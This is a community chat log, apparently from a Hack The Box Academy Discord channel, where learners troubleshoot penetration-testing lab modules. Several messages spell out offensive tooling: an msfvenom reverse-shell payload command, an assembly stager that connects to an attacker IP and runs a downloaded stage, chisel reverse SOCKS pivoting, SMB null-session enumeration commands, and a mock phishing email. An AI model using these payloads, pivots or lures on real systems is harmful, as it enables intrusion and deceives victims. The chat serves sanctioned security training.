#modules

i tried getting the id_rsa i get permission issues

something aint right

i even used metasploit too

for smb_login module

@fickle crystal what command did you run?

oh iy found it

wait it found it LOLLL

ACS is a t2 module careful with spoiling things

i'm sorry marcielee

i left the vpn and vm on for so long yesterday thats why i wouldnt get it the connection was off

i've had little-to-no issues with leaving the connection on overnight (i'm silly and forget sometimes)

i have so many things running in the background on my vm too

but yeah idk maybe its something else

if you use kali, that's easy to do

yeah kali is way better

i havent used parrot since i started this

no, i meant kali has a bunch of bg services

lol

parrot is much lighter weight than kali

¯_(ツ)_/¯

i had to switch to kali on my work laptop since parrot was marginally slower

Kali just hit diff

oh right but im saying im more comfy with kali still

just bustin chops

whatever distro works for you

¯_(ツ)_/¯

some people use arch (btw)

https://tenor.com/view/arch-linux-arch-linux-gif-25380879

arch vm would still probably run slower than kali

arch looks hectic

Only if you make it look hectic

i use pentoo

guys i need another help

i still get the permission issues smh

&

intro to bash scripting / flow control - loops / question 1

im getting a "deprecated key derivation used" error -- any ideas? im using the scripts decryption method as it was provided

can i post my script here or is that not allowed

i got it ololololol

boy so say its not allowed then

Please dont post content from modules above tier 0

bro waited until i posted it to tell me it wasnt allowed

you did the path -- did you come across the same issue?

looked online and it seems like others are too

I didnt

hmmmmm

Had to double check the module tier

all good i was joking

didnt know it was above 0

that's not an error per-se; it's just a note saying you're using an older KD cipher

it won't prevent the code from functioning

but its not decrypting

yes it is :) if you look at the whole script, it's decrypting

and the result of that decryption will be the flag

i see that

*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
bad decrypt
40475DD7257F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:

Warning

that's not an ERROR

i see that

bad decrypt means that something is wrong (the salt in this case)

that's the actual error

confused

says length of the hash is the salt, but that isnt working

what the balls

OH

Its a dynamic value

Gotta script it

can someone explain why ${#var} gives a value with 1 less value than echo $var | wc -c

newline character

its newline pro

whoever made this module keeps including newline characters in the values and its driving me bonkers

and then the one time they don't

I am stuck on the last question of the network fundamental module

It reads : Bypass the request filtering found in the target machine’s HTTP service, and submit the flag found in the response. The flag will be in the format :HTB{…}

The flag that I see reads (HTB{Redacted}) but the page is not reading it as correct

Any advise ?

did you make sure no extra spaces/whitespace?

Yeah I have been trying for a while now

and you're submitting as
HTB{...}

As HTB{REDACTED} as REDACTED as {REDACTED}

But nothing I am stuck here

Copy/paste or manual type

HTB{S..!}

Same it shows error incorrect answer

Swap vpn regions and try again, probably a target error

Hi

c-a

Its how they repeatedly formatted it in the section

Still the same issue idk what to do at this point can you try yourself on that module to see if it works for you ?

Am on mobile rn, sorry, did you restart the target after swapping regions?

If you copy/paste it should work

Dm me the flag and use put it in between ` `like this`

Oracle TNS module - hitting a roadblock for some reason.
Ran sudo ./odat.py all in order to know what it is possible
Found a couple SIDs, used the same cmd as given in the module, but can't seem to get sqlplus cmd to work -- what am I missing?

Issue resolved [sort of] user error

What error is sqlplus giving you?

Well you gotta install sqlplus

Command not found == its not installed/in your path

There was a space wasn't there?!?

uh yea, i did install sqlplus, and still getting the error

Well it's not in your PATH, so bash doesn't see it

sudo apt install oracle-instantclient-basic oracle-instantclient-devel oracle-instantclient-sqlplus -y

wget https://deb.parrot.sh/parrot/pool/non-free/o/oracle-instantclient-devel/oracle-instantclient-devel_19.6.0.0.0-0parrot2_amd64.deb
sudo dpkg -i oracle-instantclient-devel_19.6.0.0.0-0parrot2_amd64.deb

did you get any errors during that? ¯_(ツ)_/¯

sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory

The section goes over fixing shared libraries

I ran that cmd first, and still got the error. then switched to TCP box, then back to UDP box, can run everything else except the sqlplus cmd

Well when you get the shared library error, do the fix

As i said though I just did the install script line by line bc some things didn't go right

well that worked, but seems I have the wrong net service name

Should be the same

"Most people think whenever an IP Address changes, it is a proxy, and in most cases, it's probably best not to correct them as it is a common and harmless misconception. Correcting them could lead to a more extended conversation that trails into tabs vs. spaces, emacs vs. vim, or finding out they are a nano user." goofy ass module 😭 😭 😭

agreed, prompting me for user-name and passwd and says 'net sevice name is incorrectly specified'

Skill issue fr

🔛 🔝

target box expired -- haha, i'll try again

Nano

buh nano

buhhh

😿

🔫

Some DHCP servers are configured to change IPs periodically so it's not always a proxy

when we set Payload in msfvenom or in msfconsole
What does actually mean ?
I am curios about what is exactly happening ?
Like in this command :
MiladZ92@htb[/htb]$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 -f elf -o backupjob LPORT=8080
what is the code behind -p linux/x64/meterpreter/reverse_tcp
or this :
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp

You're choosing what pre-written payloads to use

Payload is what is getting delivered to the target

break it down option by option in this case (msfvenom --help)

It is what you choose for a specific connection to work in ur case its meterpreter specially prepared for linux

specifically 64bit linux

Yuh

that's what the x64 part is

linux <-- OS
x64 <-- arch
meterpreter <-- shell catcher
reverse_tcp <-- shell type

(technically you can catch with netcat)

wow
Thanks guys
but then when we run the ./backupjob in the ubuntu , and while listening to it from the host attack , and we got the meterpreter session which is really cool
I would like to understand what does really ./backupjob did , I mean like crack the steps
really curious about the steps that backupjob did

Use teach me as if I am a 5 year old kid command to gpt with whatever question you have it explains really well that's what I do

That one I forgot !
Thanks

i mean in short it sends a tcp connection back to your machine (LHOST) with the given payload

Before u test out a payload get to know the target

when you generated the payload you specified it to be an ELF file (google it)

also be mindful that the module is placing you in the part of both the attacker and the victim

which is why it seems redundant to have you run the revshell on a target you can ssh to

Yea I was wondering what is the reason
Thanks

place yourself in the shoes of the unwitting user that got phished and Social Engineered into running the script

@safe star Are u always the victim 😢?

from definitelyadmin@legit.com
BACKUP YOUR FILES [URGENT!]
This is urgent: we are changing our backup policies you need to download this file [link to your backup script] and run it to make sure that the backup completes thank you

:p

Humans are the weakest link in any cybersecurity infra

https://tenor.com/view/pfad-pfad3-forest-maze-papagenos-chirp-gif-10838682836054019777

💀

Yea this is fact

i also may or may not be working on a research paper for phishing for my Associates degree so phishing is fresh on the brain

FML just spent an hour on the IMAP section of the footprinting module only to realize that the creds are given

using creds peeka:boo

the classic tunnel vision trap

istg I read them but it took so long to spawn the target I forgot about it

also had to boot up the VM so it took a while and my brain went: not important

another question
Do professional CPTS work a lot with Assembly language?

In a word: No

In reality: It depends, although most penetration testers are slightly familiar with the assembly family of languages there are some who have mastered it in the event they have to reverse engineer quickly and efficiently, otherwise it is sufficient to learn C since most reverse engineering programs have a psuedocode algorithm that turns ASM into C

~~speaking from LACK of experience, take with a grain of salt 😅 ~~

no

hi all o/

so like do you do something like this ?

this is from chatGPT , explaining what does linux/x64/meterpreter/reverse_tcp stager paylod do
Approximate Assembly Code
While I can’t give you the exact byte-for-byte code in backupjob (since it’s dynamically generated and depends on your specific LHOST and LPORT), I can provide an approximate representation of what the assembly might look like for a linux/x64/meterpreter/reverse_tcp stager. This is based on reverse-engineering similar payloads and Metasploit’s open-source codebase.
; Linux/x64 Meterpreter Reverse TCP Stager (simplified)

section .text
global _start

_start:
; 1. Create a socket (socket(AF_INET, SOCK_STREAM, 0))
xor rax, rax ; Clear rax
mov al, 41 ; sys_socket (41)
mov rdi, 2 ; AF_INET (IPv4)
mov rsi, 1 ; SOCK_STREAM (TCP)
xor rdx, rdx ; Protocol (0)
syscall ; Call kernel
mov rbx, rax ; Save socket fd in rbx

; 2. Set up sockaddr_in structure on stack
push 0x5010           ; Port 8080 (0x1F90 in hex, big-endian)
push 0x540f0a0a       ; IP 10.10.15.84 (0x0a0a0f54 in hex)
push word 0x2         ; AF_INET (2)
mov rsi, rsp          ; Pointer to sockaddr_in
mov rdx, 16           ; Length of sockaddr_in

; 3. Connect to attacker (connect(sockfd, sockaddr, addrlen))
mov rax, 42           ; sys_connect (42)
mov rdi, rbx          ; Socket fd
syscall               ; Call connect

; 4. Receive the stage (read(sockfd, buffer, size))
xor rax, rax          ; sys_read (0)
mov rdi, rbx          ; Socket fd
sub rsp, 0x1000       ; Allocate buffer on stack (arbitrary size)
mov rsi, rsp          ; Buffer pointer
mov rdx, 0x1000       ; Bytes to read (adjust as needed)
syscall               ; Read the stage

; 5. Jump to the received code
jmp rsi               ; Execute the downloaded stage in memory

Explanation:
System Calls: Linux uses syscall instructions to interact with the kernel. The numbers (e.g., 41 for socket, 42 for connect) are specific to x86-64 Linux.
IP and Port: The values 10.10.15.84 and 8080 are hardcoded into the binary as hex (0x0a0a0f54 and 0x1f90). These are pushed onto the stack to form the sockaddr_in structure.
Reverse Connection: The connect call initiates the outbound TCP connection to your attacking machine.
Stage Loading: The read syscall fetches the Meterpreter stage, and jmp rsi transfers control to it.

???

this is from chatGPT , explaining what does linux/x64/meterpreter/reverse_tcp stager paylod do
Approximate Assembly Code
While I can’t give you the exact byte-for-byte code in backupjob (since it’s dynamically generated and depends on your specific LHOST and LPORT), I can provide an approximate representation of what the assembly might look like for a linux/x64/meterpreter/reverse_tcp stager. This is based on reverse-engineering similar payloads and Metasploit’s open-source codebase.

trying to learn
But I don't want to spend time on something that it is not really neccessary at the moment maybe

you're diving too much in the weeds

i'll tell you that rn

chatgpt is not very reliable

you cant also execute on the stack

by default

yea , my curiosity alaways
I'll leave it then

thanks a lot 🙏🏻

breaking it into asm is heavy work

yea

you're better off disecting it with gdb

instead of having GPT tell you (potentially) nonsense

i have a problem with the web cache poisoning in Abusing HTTP Misconfigurations module
Before all i made all the websecurity module on this subject, i know how to exploit it, i modified my host file etc i poisoned/cached the response, i even did an intruder with null payloads to be sure it is always poisoned (i can send screenshots) but the problem is the vhost interactsh.local because when i use the form as a user to test it, it doesnt work as expected:

looks like you have burpsuite running and it's being a bit silly

info -d really helps sometimes

why it would be silly?

it doesnt change anything on the problem, the "bot" doesnt post the login

i even tried the xss

no idea; if burpsuite isn't running and you're loading the page there's issues

but not sure what exact issue this may be

did you try hard refreshing the page? ctrl+shift+r

the problem isnt on burpsuite, the problem is the bot which doesnt post his id

and the bot doesnt go through my browser

with burp

the page is poisoned

you've been told before @sinful narwhal to not spoil module info above tier 0

whattt !!

I just asked a question

your screenshot contained username info

it was my first msg

of stuff that would be spoiler

not just today

@tall saffron same to you too friend, don't spoil module info above t0

lol it is the same screenshot as the course but ok

it's content from the module; that module is above tier 0

That's what makes it a spoiler XD

so it's still a spoiler

oh ok spoiler of course content my bad

i was thinking about solution

xD

taps sign

any help on this because it is clearly a problem in the lab

but since it is only responding to vhost of IP

and since the help chatbox send us here for official support of modules problems

ok bye I'll never ask again

this isn't "official support" it's unofficial support of problems

you can ask questions lol; just be mindful of spoiling content of modules

Does the module provide interactsh.local? If not, the host is logically unknown.

nope it is official since the chatbox send us officially

nope

that's not how that works

of course it did

this is the official HTB server, yes, but doesn't mean that this is an official support center

of course it did (was for that)*

the rule in the channel description aligns with the HTB ToS

but anyway

In which section do you work?

and i'm explaining what this means

:) also they're axing the forum so that message is likely to change

web cache poisoning in Abusing HTTP Misconfigurations module

but it isnt so

each time here you are to discuss things like that without any help for people, boring

again it explains that this channel is on the official discord server but that doesn't mean you're guaranteed answers nor are you allowed to spoil module content above tier 0

If nothing has been changed, there is no interactsh.local in this lab

which is in-line with the ToS and Guidelines

modules above tier 0 are "paid" modules; therefore the screenshots and such behind them are paywalled

There is

it was just an error msg, do you think that a localhost IP is a spoiling content of modules

you had an SPN/username in your paste

clock_skew_too_great error means that your time and the server time don't line up

I can send you screenshot of the lab instruction if you want. You must capture the credentials so there is always interactsh.local

On my phone rn but will send the lab vhost

There is interact and xxx.hostheaders.htb iirc

you are here, right?

https://academy.hackthebox.com/module/189/section/2008

Nope

The web cache poisoning in host headers attack

https://academy.hackthebox.com/module/189/section/2016

ah, i see

let me check my notes

I know 100% sure it is a problem with the lab

I can send you all the screenshots

There isnt more simple

You poison the cache for the login form

Or a XSS but on a login form for stealing cookie isnt Logic but i tried too

Ok ty

And like i said i even tried when i did the lab today to use intruder with null payload to have the cache poisoned for ever xD

Yes, please send me a DM telling me exactly what you have done.
Then I can see how I can nudge you in the right direction without spoiling anything here

Im on the road but will do it asap. No hurry i just feel the lab was broken and since we dont have creds, Can you confirm all is in the login page admin.blabla?

Yes, it's about the login page

On the Active Directory Enumeration & Attacks -> Privileged Access page, they show a BloodHound "CanRDP" edge between "Domain Users" and MS01. I have run SharpHound.exe -c All -d inlanefreight.com on MS01 for the third time now in three separate lab instances and I can't reproduce this example, or the "CanPSRemote" edge with the custom cypher query.

I've seen other people asking about the same issue, but I've never seen an answer. Any ideas?

Whether I use the built-in query or the custom cypher query, BH just says "No results match your data"

sorry for the ping but I'm encountering the same issue, what was the issue in the end?

use sudo

or use ligolo 😎

Aaaah thanks a lot!

Yeah definitely planning on watching a video about it to start using it

Highly recommend for complex pivot scenarios

much easier than setting up proxychains

^

i recommend completing AEN completely blind

don't read the module or questions just spawn target; max life and boot2DA

you'll feel much better about yourself then

and be able to better pinpoint your weaknesses to brush up on

That was what I was doing until I couldn't get anything with dynamic port forwarding and had to check the section in the module

But even then they didn't use sudo so I was confused

I removed the proxychains package, tried different versions but still couldn't make it works, did not think of using sudo 😅

But once again, thanks! :p

max life?

max spawn time

lifetime

¯_(ツ)_/¯

using pwnbox makes it trickier because you can only extend pwnbox life under a certain threshold

Yeah probably best to use an attacking machine with the vpn

Can someone DM me for helping NoSQL SA II?

You can send me a dm

Wish u could extend unlimited

Tbh

in TCPDump, according to one of the labs,
this tcpdump result is supposed to be a full TCP 3 way handshake:

18:34:01.237834 IP 172.16.146.2.43804 > 95.216.26.30.80: Flags [S], seq 749874084, win 64240, options [mss 1460,sackOK,TS val 3101551032 ecr 0,nop,wscale 7], length 0
18:34:01.389479 IP 95.216.26.30.80 > 172.16.146.2.43804: Flags [S.], seq 2667566931, ack 749874085, win 65160, options [mss 1460,sackOK,TS val 1169094229 ecr 3101551032,nop,wscale 7], length 0
18:34:01.389497 IP 172.16.146.2.43804 > 95.216.26.30.80: Flags [R], seq 749874085, win 0, length 0

but the client packet has the flag R, which means "reset", then how is this supposed to be a full 3 way handshake?
from what i know, it must be an ACK flag in the end to be counted as a full 3 way handshake.

im trying to get my vpn connection to work. But i can't seem to reach the host from the Session Security module

rom 10.10.14.1 icmp_seq=31 Destination Host Unreachable                                            │
From 10.10.14.1 icmp_seq=32 Destination Host Unreachable                                            │
From 10.10.14.1 icmp_seq=33 Destination Host Unreachable                                            │
From 10.10.14.1 icmp_seq=34 Destination Host Unreachable                                            │
From 10.10.14.1 icmp_seq=35 Destination Host Unreachable                                            │
From 10.10.14.1 icmp_seq=36 Destination Host Unreachable                                            │
From 10.10.14.1 icmp_seq=37 Destination Host Unreachable                                            │
From 10.10.14.1 icmp_seq=38 Destination Host Unreachable                                            │
From 10.10.14.1 icmp_seq=39 Destination Host Unreachable                                            │
From 10.10.14.1 icmp_seq=40 Destination Host Unreachable

machine started, vpn is connected

ill try and terminate and download new vpn config etc.

got it working

Does anyone have an idea why this one doesn't work?
I checked twice the ip of DC, the password of user and domain
Proxychains works normal with evil-winrm so thats not the issue, i even change the timeout time but still im stuck

It's "AD Enumeration & Attacks - Skills Assessment Part I"

https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API/Using_Fetch#making_cross-origin_requests

please remove the screenshot and show just the error and the end of your proxychains config

so the error is:
[-] RemoteOperations failed: [Errno Connection error (172.16.6.3:445)] timed out

Please remove that link @sweet sparrow

and proxychains config is pretty default

# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4     127.0.0.1 9050
socks5 127.0.0.1 1080

what program are you using to start the socks proxy?

chisel

Removed it for you @sweet sparrow - don't share potential spoilers like that please.

it's an aborted attempt at a handshake

that's not a full handshake

show attacker and victim commands and outputs

In the Pivoting, Tunneling, and Port Forwarding I want to model the socat bind&reverse shell
But there aren't any creds to the windows machine
is this inteded? do they want us to find the password to the windows machine? or it'll be later in the module that i can test this?

i know, but the lab says it is a full handshake, this is the stated text:

What is the timestamp of the first established conversation in the pcap file?
May 11, 2021 11:34:01.237834000 EDT

the "first established" means a successful full handshake, isn't?

are you going to let the lab gaslight you?

for the attacker (kali):
chisel client -v <IP_HERE>:1234 socks
for victim (win):
C:\chisel\chisel.exe server -v -p 1234 --socks5

well, if it is written by someone who is more enlgihtened than me, then probably yes, i will think i'm the wrong

a rst means the connection was aborted a full handshake means the connection is established

those two things are mutually exclusive, you cannot have both at the same time

you probably want R:socks on attacker and --reverse on victim

@green shuttle please have a look at the #rules and especially rule number 8

so, the stated text is incorrect, right?

yeah

Timestamps look different to me, I'd check again...
then again I am also blind, keep in mind

#1234357888114364508

yes i noticed, but i thought the writer miswrote the timestamp in the answer, because there is absolutely no 11 in the whole file he provided

thanks 🙂

so yeah i've reversed proxy but still the secretsdump.py is not working
on the other hand evil-winrm works perfectly

i mean secretsdump still gets time out

Probably some port forwarding needed for that, not sure what ports secretsdump uses though 👀

standard 445 i guesss

I mean for callbacks

wait no I might be stupid

never done the module so

@thin parrot I'm deleting your question here because it contains spoilers. But please send me a DM. I'll be happy to answer your questions then.

you figured it out?

Anyone can dm chat with me about Advanced XSS and CSRF Exploitation Skills Assessment? I have a problem with the last step. I'm not getting any calls from the API service

Hi guys, Im struggling to enumerate shares... with SMB.. The account does not have a password

hii

netexec smb <IP> -u Guest -p '' --shares

nxc smb: error: argument -p/--password: expected at least one argument

smbclient -L //<ip>

but... its Using CME Module..

oh...

Unless you mean Im not supposed to be using CME / Netexec lol

try providing a blank user

does that change anything

erm.. well The solution given was -u guest -p '', so yes, it kinda matters? unless im supposed to ignore the solution

im 95% through CPTS module btw.. Im taking USing CME Module for the extra knowledge

does -p="" work? I had a issue on a new vm install where my netexec install didn't parse arguments right. In this specific case I could solve it with providing the argument without a space inbetween like here, but I ultimately ended up using the prebuild netexec from the release page

okay buddy

I tried using -p='' and the authentication worked however the was an error ERROR NetBIOSTimeout on target <IP>: The NETBIOS connection with the remote host timed out

Thanks for the replies here.

@bold wagon hi

Yeah it took me a day to do it. None of the module parts ever took me more than a couple of hours, that DNS one still haunts my dreams

I remember i was crying in PayloadBunny's dms at 3am at night

Anyone wants to work with me

I think it comes too early in the course. If it was like the 4th module I would've had more understanding to complete it without problems

Or I could use smbmap -H <IP> -u Guest -p='' as an alternative hahaha

What do you basically want to do

Enumerate Shares

So you just want to gather information of what

?

It's a Module Exercise, enumerate shares and find which share that has Read and Write Privs using the Account that we have access

I can help you afterwards if you want for free just dm me

😮 That's kind of you. Sure

So you basically want to get write shares cause they allow us to inject payloads and also it can be counted as a vulnerability if you can do this without and user interaction and priveleges

Yeap.. I'm just having fun figuring out the various ways and means of doing enumeration with the tools available.. I like to have more than one option sometimes

Do you have the explicit permissions

/rank

explicit? not yet. I am just starting out at Exploiting NULL/Anonymous Sessions section in Using CME Module

What did you mean by working with you though??

I could help you I need a partner I get bored by the way you mention of doing Null session is it old windows like windows 8 ore something

I guess I can't reveal much since it is tier III content, but no, it is not windows 8

Don't mind having a study buddy either

So may be it might be a misconfiguration in modern windows cause they donnot allow null session anyomore

Ohhhh, alright.. yea you might have a point there

crackmapexec smb <target-IP>

You sound like a pro... haha

Did you use this

no, i use netexec.. i dont have CME on my attack host

Is you host a module of hackmybox training or real another device

" What type of network cable is used to transmit data over long distances with minimal signal loss? " , I answered "fiber optic" but it didn't work

Hi I'm having real trouble getting the solution for the second question in the Log Poisoning section of the Local File inclusion module to work.

I have checked the solution and had someone else check it and it does work for the other person. However it doesn't work for me. I'm going to do it in the pwn box, but I'm concnerned aabout my setup. Is there anyone around I can chat to about this?

in the HTB academy network module

it may expect a specific format

yes, but I can't find any specific format, in the session in question or in the previous ones

hey can i ask questions here about the academy modules ?

network foundation module

yes

oh hy so i have been doing the nmap module and i think i got the flag but it says it is not the right one ?

for some questions its really hard to answer coz of not typing how its written in module

is my answer write?

its not working

@hollow knoll please don't share any answers

i thought its ok for tier 0

my bad

Make sure you don't have any spaces at the beginning or end of the string.

what about the answer, mean the scrren shot i sent

i coppied the thing and i can show u what i foudn i think this is a flag ?

sory i am very new to this and it went really okay and well but now i am stuck and i can't find anything else atm

You can ask questions, but you should not post answers to a question.
You can also simply make the answer unreadable and repost the screenshot.

you'll get it

my bad but now how can i verify that my answer was write if i do here someone will have to so , im dumb sorry

If you are not sure, please send me the exact question and what you did via DM. I will then take a look at it.

right here or in a dm ?

in a dm please

allright i am tryin to send you the message

@west rampart

network foundations module

some questions in this module dont accept answer in short form for example:- peer-to-peer for P2P

then maybe you've got the wrong answer

that's expected

https://www.reddit.com/r/hackthebox/comments/1iyelki/stuck_on_this_question_lol_in_new_network/

can you tell me the answer

no

😄

im stuck

or can you tell me my answer is wrong

if the answer doesn't get accepted, something is wrong

where the control plane (the part that makes decisions) is completely separate from the workers

the question asked for an architecture buddy

format: two words one of which is hyphenated

bahahhaha

i think i forgot everything from that section

can you tell me for this pls

'control plane different from data plane'

start from the dumbest option, then work your way up

i will read the whole section again

adhd

💔💔💔💔 this so tough

If you haven’t been doing it, I would suggest taking notes as you do the modules. It might help with recalling and can be easier to look back to depending on where you take the notes.

im doing this stuff my myself for first time(learning), i think thats why im having problems

learning something new is hard?

and then i have to reread same line for 3-4 times coz i was thinking about somethign else

That could be part of it. This stuff can take time to learn, but again, while it’s entirely up to you whether you do it or not, writing down what you read over could help with recalling and can be used as an easier place to look back to.

thanks, will keep a note taking app open and write important stuff

that was right

From what I’ve learned, unless you’re doing it on paper, obsidian is a good note application where you can organize your notes.

yeah obsidian but wasted time on making it look good then i didnt try after that

Although for me, I have both a paper set and a digital set in case I lose one of them.

i keep my progress record on paper

Well what I’ve been doing recently is after finishing a page, I copy it over to chatgpt and ask it to organize the information in a neat format, which I then write down in my notebook.

simple calender type

i guess it follows an architectural design

im blank like i dont know what to write and what not to

that was the answer format given

i thought meow is two word man its over for me

Yeah, that was part of the reason why I gave it to chatgpt. I find it does a good job of summarizing it while making a nice layout.

😭🙏

I’ll admit that I found writing down everything in the modules word from word to be very time consuming.

yeah thats my problem i dont know which part is important over the other

Same. But from the modules I’ve done, I’ve usually skipped over the parts that discusses history or stuff that I don’t believe would help me learn how to do things.

@near rock thanks for sharing, that ai part i never thought about will use it
good luck and thanks again

i need to learn how to write

in conversation too*

👋 Hello

@lusty thicket thanks blud

No problem. I’d say that you could try it out for now and see how things turn out.

https://tenor.com/view/cats-cute-this-cate-only-stare-at-cc-crave-gif-13210901452555789023

I recently finished Linux fundamentals, and I can’t say I remember every single thing that was discussed in it, but I did get a better grasp over things and intend to keep reviewing it.

like the commands?

i did it half way through i use cheat sheet if i forget command and now i dont have look at cheat sheet for some commands learned it while using em

thats how im doing the modules i dont sit and memorize of the stuff

Well the stuff on the cheat sheet is displayed in the modules. The cheat sheet simply has the important commands in one place.

yeah

I’ll admit that I do need to learn more about the things that go with the commands (such as things like -L, -sV, and other types).

yeah that filter stuff

In Window Privilege Escalation but my question is rather general to User Rights. Why are some rights "disabled" where they apply to an account but can be enabled by the user themselves? E.g. SeShutdownPrivilege

PS:112 > whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled

Might guess enabling privileges trips an Event Log entry, but so too should whatever action is taken with the privilege. Googling around, I found that it might have to do with inheritance? Processes spawned by the user only inherit //enabled// processes?

Hello guys,
I am working on the last part of Attacking WPA/WPA2 Wi-Fi Networks - Skills Assessment>

I patched the hostapd-wpe file, but still getting the error message.

Anyone had the same problem?

can i dm someone about HTTP Attacks - Skills Assessment? i did the TE.CL but can't put the CRLF injection to work, i don't receive any email 😦

Hi anybody is recently working on checker.htb machine. i am bit confused right now

#1342917580561580063

gain access by verifying your account -> #welcome

hi

hello guys

Inject in every parameter

One of them will work

Hi

i'm starting to get seriously frustrated with how often i'm having to restart targets in order to make them work properly. how am i meant to know i'm doing things right when i'm getting the wrong response 80% of the time?

@viral badger http attacks had been giving me a really hard time as well

You will manage!
These HTTP attacks were the most painful modules in HTB

I feel ya i'm stuck for 7 days lol

If you got the TE.CL the SMTP header injection is easy

@viral badger module is above t0

:(

🥹

@viral badger craft a valid POST to that endpoint then just copy in your “nested” HTTP request

if b5null is willing take to dms to avoid spoiling for others

Sure

Can i DM real quick? 🙂

Sure

thanks @fathom pendant @dapper moth

Glad to have helped!

can anyone help me to solve the CTF Escape two . I found a krbt hash of the three uses but i can’t crack the hash . So can you help me . Iam a new in this discord channel

you were already directed where to ask

When trying to install ptunnel it seems like the sudo ./autogen.sh fails
I cannot see the ptunnel-ng binary
anyone tuckled the same problem?
edit: its under ./src/ptunnel-ng 🤦‍♂️

#boxes is the appropriate place; you'll need to read and follow #welcome instructions to access

Which module is this

CWEE’s HTTP Attacks or Abusing HTTP misconfigurations… one of the 2, can’t remember ever which

Oh so not cpts

hello

Hello again everyone
I am studying this now : https://academy.hackthebox.com/module/158/section/1434 (Web Server Pivoting with Rpivot)
It is really straight forward
But I stuck in the last step !
installed python2.7
so I did cloned the rpivot
cd rpivot
open terminal and run : python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
then another terminal
copy/paste the entire directory to the pivot host scp -r rpivot ubuntu@<IpaddressOfTarget>:/home/ubuntu/
ssh to pivot and run the client : python2.7 client.py --server-ip 10.10.14.18 --server-port 9999

I got the connection
I made sure that in the file /etc/proxychains.conf has this line : socks4 127.0.0.1 9050
and then I run proxychains in my machine :
and getting this :

┌─[eu-academy-6]─[10.10.15.84]─[htb-ac-745983@htb-cpqp0zfjj5]─[~]
└──╼ [★]$ proxychains firefox-esr 172.16.5.135:80
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
/usr/lib/firefox-esr/browser/defaults/preferences/00parrot.js:289: prefs parse error: unknown keyword
/usr/lib/firefox-esr/browser/defaults/preferences/00parrot.js:308: prefs parse error: expected ';' after ')'
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
<--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9050 ... addons.mozilla.org:443 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9050 ... firefox.settings.services.mozilla.com:443 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9050 ... firefox.settings.services.mozilla.com:443 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:

any idea about what I missed here ?!

**Update **
I got this now after waiting around 15 min
[proxychains] Strict chain ... 127.0.0.1:9050 ... cdn.statically.io:443 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9050 ... push.services.mozilla.com:443 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.5.135:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:9050 ... addons.mozilla.org:443 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9050 ... push.services.mozilla.com:443 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9050 ... push.services.mozilla.com:443 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9050 ... push.services.mozilla.com:443 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9050 ... firefox.settings.services.mozilla.com:443 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9050 ... firefox.settings.services.mozilla.com:443 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9050 ... firefox.settings.services.mozilla.com:443 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9050 ... firefox.settings.services.mozilla.com:443 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9050 ... firefox.settings.services.mozilla.com:443 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9050 ... firefox.settings.services.mozilla.com:443

Working through the Network Foundations module and a little confused on one of the last questions.

It wants me to use netcat to connect to the target on port 21 passively, then connect again to the data channel and retrieve the .txt file with the flag.

No issue connecting to the control channel on 21 but when I connect to the data channel it tells me "Connection refused" If anyone has any advice lemme know! I have the right port # as far as I can tell

oooh it works now !!!
[proxychains] Strict chain ... 127.0.0.1:9050 ... firefox.settings.services.mozilla.com:443 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9050 ... firefox.settings.services.mozilla.com:443 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.5.135:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.5.135:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:9050 ... push.services.mozilla.com:443 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9050 ... cdn.statically.io:443

and the page appeared in firefox
and I find the Flag

@supple flicker this isn't a CTF recruitment center read #rules

On the Active Directory Enumeration & Attacks -> Privileged Access page, they show a BloodHound "CanRDP" edge between "Domain Users" and MS01. I have run SharpHound.exe -c All -d inlanefreight.com on MS01 for the third time now in three separate lab instances and I can't reproduce this example, or the "CanPSRemote" edge with the custom cypher query.

Whether I use the built-in query or the custom cypher query, BH just says "No results match your data"

I've searched chat history for the same issue, but no answers. Anyone have any ideas?

try regathering the data

I have. 3 times in 3 separate lab instances.

Over the span of a week.

reach out to support then if you believe it's bugged

I'll do that. Just checking here first. Thank you.

Today is the day

Need module for python

Python for hacking.

Guys is anybody here who has passed Windows Privilege Escalation Module?

There's not really a module that teaches you "python for hacking" plenty of the modules reference python tools

And there's an intro to python module

I mean anything for python in HTB Academy module.

Sorry bro.

But beyond that there's no academy module focused on specifically writing hacking tools in python

